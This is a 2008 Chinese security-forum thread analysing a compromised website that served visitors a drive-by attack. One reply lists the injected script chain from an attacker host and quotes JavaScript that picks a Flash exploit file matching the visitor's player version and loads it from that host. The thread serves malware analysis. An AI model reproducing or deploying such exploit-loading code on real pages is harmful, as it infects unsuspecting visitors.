收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) www.126disk.com/
返回列表 发新帖
查看: 4068|回复: 4
收起左侧

[已鉴定] www.126disk.com/

 关闭 [复制链接]
KR666666KR
发表于 2008-9-24 12:08:01 | 显示全部楼层 |阅读模式
被挂www.126disk.com/
回复

举报

末日逐沙
头像被屏蔽
发表于 2008-9-24 12:15:08 | 显示全部楼层
楼主你什么配置啊 ,哪里被挂了,截张图
回复

举报

yjwfdc
头像被屏蔽
发表于 2008-9-24 13:39:41 | 显示全部楼层
打开后,tw 虚拟内存用了五百多m
回复

举报

tanlimo
发表于 2008-9-24 14:39:46 | 显示全部楼层
Log is generated by FreShow.
[wide]http://www.126disk.com/
    [object]http://ad.feeip.com/file/da.js
        [script]http://ww.feeip.com/file/logo.js
        [script]http://ww.feeip.com/file/swf/swfobject.gif
        [script]http://ww.feeip.com/file/f1.js
        [script]http://ww.feeip.com/file/swf/swfobject.gif
        [script]http://ww.feeip.com/file/f2.js
        [script]http://ww.feeip.com/file/office.js
            [object]http://ww.feeip.com/file/lo.exe
        [script]http://ww.feeip.com/file/real2.js
        [script]http://ww.feeip.com/file/real.js
        [script]http://ww.feeip.com/file/lz3.js
        [script]http://ww.feeip.com/file/lz2.js
        [script]http://ww.feeip.com/file/lz.js
        [script]http://ww.feeip.com/file/bf.js
        [script]http://ww.feeip.com/file/pps.js
        [script]http://ww.feeip.com/file/xunlei.js
        [script]http://ww.feeip.com/file/sdr.js
        [script]http://count23.51yes.com/click.aspx?id=238288070&logo=1
  1. <htm><body><SCRIPT language="JavaScript">

  3. var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("http://ww.feeip.com/file/swf/tc115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("http://ww.feeip.com/file/swf/i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("http://ww.feeip.com/file/swf/i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("http://ww.feeip.com/file/swf/i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("http://ww.feeip.com/file/swf/i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("http://ww.feeip.com/file/swf/i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}

  5. </SCRIPT></body></htm>
复制代码
挂马的人很狡猾,因为用了cookie所以所有的挂马地址都不可以直接访问,得到的全是error ID:400,懒得再看了

[ 本帖最后由 tanlimo 于 2008-9-24 22:36 编辑 ]
回复

举报

甜酸排骨
发表于 2008-9-24 15:00:49 | 显示全部楼层
原帖由 yjwfdc 于 2008-9-24 13:39 发表
打开后,tw 虚拟内存用了五百多m

opera一切正常,紅傘C版么反應
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 12:41 , Processed in 0.129401 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表